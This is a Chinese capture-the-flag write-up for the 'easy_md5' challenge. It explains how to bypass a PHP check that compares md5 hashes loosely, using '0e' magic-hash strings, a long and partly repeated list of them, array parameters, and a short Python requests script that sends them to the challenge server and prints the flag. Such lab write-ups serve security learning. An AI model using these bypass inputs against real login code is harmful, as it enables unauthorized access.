[SWPUCTF 2021 新生赛]easy_md5

简介: [SWPUCTF 2021 新生赛]easy_md5

0×01 打开题目环境

内容如下
<?php
highlight_file(FILE);
include 'flag2.php';

if (isset($_GET['name']) && isset($_POST['password'])){
    $name = $_GET['name'];
    $password = $_POST['password'];
    if ($name != $password && md5($name) == md5($password)){
        echo $flag;
    }
    else {
        echo "wrong!";
    }

}
else {
    echo 'wrong!';
}
?>
wrong!

其中重要代码是
if ($name != $password && md5($name) == md5($password)){
echo $flag;
}
&&左右两个条件都满足,意思是name的值不等于password,但是,md5值中让name的值和password的值相等,即可输出flag

0×02 进行解题 拿flag

  1. 使用0e开头的数字传递参数,PHP会将0e开头的数字转化为0,使MD5的值相等,但是变量的值不相等
    s878926199a
    0e545993274517709034328855841020
    s155964671a
    0e342768416822451524974117254469
    s214587387a
    0e848240448830537924465865611904
    s214587387a
    0e848240448830537924465865611904
    s878926199a
    0e545993274517709034328855841020
    s1091221200a
    0e940624217856561557816327384675
    s1885207154a
    0e509367213418206700842008763514
    s1502113478a
    0e861580163291561247404381396064
    s1885207154a
    0e509367213418206700842008763514
    s1836677006a
    0e481036490867661113260034900752
    s155964671a
    0e342768416822451524974117254469
    s1184209335a
    0e072485820392773389523109082030
    s1665632922a
    0e731198061491163073197128363787
    s1502113478a
    0e861580163291561247404381396064
    s1836677006a
    0e481036490867661113260034900752
    s1091221200a
    0e940624217856561557816327384675
    s155964671a
    0e342768416822451524974117254469
    s1502113478a
    0e861580163291561247404381396064
    s155964671a
    0e342768416822451524974117254469
    s1665632922a
    0e731198061491163073197128363787
    s155964671a
    0e342768416822451524974117254469
    s1091221200a
    0e940624217856561557816327384675
    s1836677006a
    0e481036490867661113260034900752
    s1885207154a
    0e509367213418206700842008763514
    s532378020a
    0e220463095855511507588041205815
    s878926199a
    0e545993274517709034328855841020
    s1091221200a
    0e940624217856561557816327384675
    s214587387a
    0e848240448830537924465865611904
    s1502113478a
    0e861580163291561247404381396064
    s1091221200a
    0e940624217856561557816327384675
    s1665632922a
    0e731198061491163073197128363787
    s1885207154a
    0e509367213418206700842008763514
    s1836677006a
    0e481036490867661113260034900752
    s1665632922a
    0e731198061491163073197128363787
    s878926199a
    0e545993274517709034328855841020
    240610708
    0e462097431906509019562988736854
    314282422
    0e数字参考连接:

     https://www.bbsmax.com/A/kmzLxxDYzG/
     (使用s开头!)
    

    例如
    name=s878926199a
    password=s155964671a
    传参
    flag=NSSCTF{b778dd89-aaac-4941-ad61-5a7c973938e5}

  2. 使用数组进行绕过,因为MD5不能加密数组,所以MD5的值都没NULL,满足了两变量MD5的值相同
    name[]=n
    password[]=n
    其中'n'为任意数字,都可以
    传参
    flag=NSSCTF{b778dd89-aaac-4941-ad61-5a7c973938e5}

  3. 通过python脚本
    import requests

    网站的URL

    url = "http://node2.anna.nssctf.cn:28014/"

    用get方法传递的name参数

    name = "s878926199a"

    用post方法传递的password参数

    password = "s155964671a"

    两个参数的md5值均以0e开头且后面的字符均为纯数字

    发送post和get请求,并获取响应对象

    response = requests.post(url, data={"password": password}, params={"name": name})

    打印响应的文本内容

    print(response.text)
    其中3方法可以结合1和2
    输出的response.text即为flag
    运行
    flag=NSSCTF{b778dd89-aaac-4941-ad61-5a7c973938e5}

目录
相关文章
|
3月前
[SWPUCTF 2022 新生赛]base64
[SWPUCTF 2022 新生赛]base64
58 0
|
3月前
NSS [SWPUCTF 2021 新生赛]easy_md5
NSS [SWPUCTF 2021 新生赛]easy_md5
27 0
|
3月前
|
数据安全/隐私保护
NSS [SWPUCTF 2022 新生赛]奇妙的MD5
NSS [SWPUCTF 2022 新生赛]奇妙的MD5
39 0
|
3月前
|
Shell
[SWPUCTF 2021 新生赛]gift_pwn-入土为安的第十五天
[SWPUCTF 2021 新生赛]gift_pwn-入土为安的第十五天
136 0
|
3月前
NSS [SWPUCTF 2021 新生赛]pop
NSS [SWPUCTF 2021 新生赛]pop
57 0
|
3月前
|
JavaScript
[SWPUCTF 2022 新生赛]js_sign
[SWPUCTF 2022 新生赛]js_sign
43 0
|
3月前
|
JSON 数据格式
NSS [SWPUCTF 2021 新生赛]jicao
NSS [SWPUCTF 2021 新生赛]jicao
45 0
|
3月前
NSS [SWPUCTF 2021 新生赛]no_wakeup
NSS [SWPUCTF 2021 新生赛]no_wakeup
30 0
|
3月前
NSS [SWPUCTF 2022 新生赛]where_am_i
NSS [SWPUCTF 2022 新生赛]where_am_i
61 0
|
6月前
|
数据安全/隐私保护 Python
BUUCTF [ACTF新生赛2020]base64隐写 1
BUUCTF [ACTF新生赛2020]base64隐写 1
487 0
BUUCTF [ACTF新生赛2020]base64隐写 1